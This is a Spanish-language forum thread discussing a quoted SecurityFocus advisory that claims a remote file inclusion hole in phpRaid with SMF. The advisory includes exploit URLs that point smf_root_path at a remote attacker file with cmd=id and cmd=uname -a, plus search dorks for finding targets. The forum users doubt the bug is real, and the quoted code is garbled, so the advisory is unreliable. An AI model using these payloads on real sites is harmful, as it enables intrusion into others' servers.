Alguien sabe de este Bug para los foros SMF

[Minosh]

http://www.securityfocus.com/archive/1/433253/30/0/threaded [nofollow]
# Kurdish Security Advisory

# phpRaid Remote File Include [SMF] :}

# "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

# Contact : irc.gigachat.net [nofollow] #kurdhack & www.PatrioticHackers.com [nofollow] & botan (at) linuxmail (dot) org [email concealed]

# Risk : High

# Class : Remote

# Script : phpRaid

# Script Website : http://www.spiffyjr.com [nofollow]

# Version : phpRaid v2.9.5

" v3.0.b1

" v3.0.b2

" v3.0.b3

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards

# Special Bastard : Turkish Lame

# w0rkz : "phpRaid" "inurl:"phpRaid" etc.

---------------------------------------------------------------------

# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code : Now SMF portal code

// includes

include($smf_root_path= . 'SSI.php');

-----------------------------------------------------------------------

http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www [nofollow]
.yourcode.com/x.txt?&cmd=id

http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http:/ [nofollow]/www
.yourcode.com/x.txt?&cmd=uname -a   

[Pedi que me borren]

Eso no es un bug..

Tenes sitios de ejemplo?

[Minosh]

Eso no es un bug..

Tenes sitios de ejemplo?

entonces que puede ser eso , http://www.securityfocus.com/archive/1/433253/30/0/threaded [nofollow]


# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code : Now SMF portal code

// includes

include($smf_root_path= . 'SSI.php');

aqui dice que esta vulnerable el archico SSI.PHP

[Pedi que me borren]

Ya conozco ese sitio...
Que  pongan un ejemplo de vulnerabilidad...y no el codigo...

Fijate en la seccion de bugs en ingles:
http://www.simplemachines.org/community/index.php?board=60.0
Puede que esten mas al tanto...aunque no veo en el codigo nada raro...

[Minosh]

Ya conozco ese sitio...
Que  pongan un ejemplo de vulnerabilidad...y no el codigo...

Fijate en la seccion de bugs en ingles:
http://www.simplemachines.org/community/index.php?board=60.0
Puede que esten mas al tanto...aunque no veo en el codigo nada raro...

pues para mi que eso supuestamente bug  es falso , no es real , primero no demuestra mas datos del bug, el otro , no dan a conocer, ejemplos de paginas, la otra, no dice para que version de foro es '

[Pedi que me borren]

http://www.spiffyjr.com/forums/viewtopic.php?t=98&highlight=smf

Habria que probarlo...aunque dudo que sea real
Son sitios anti-nuke, mas que nada
http://www.zone-h.org/en/defacements/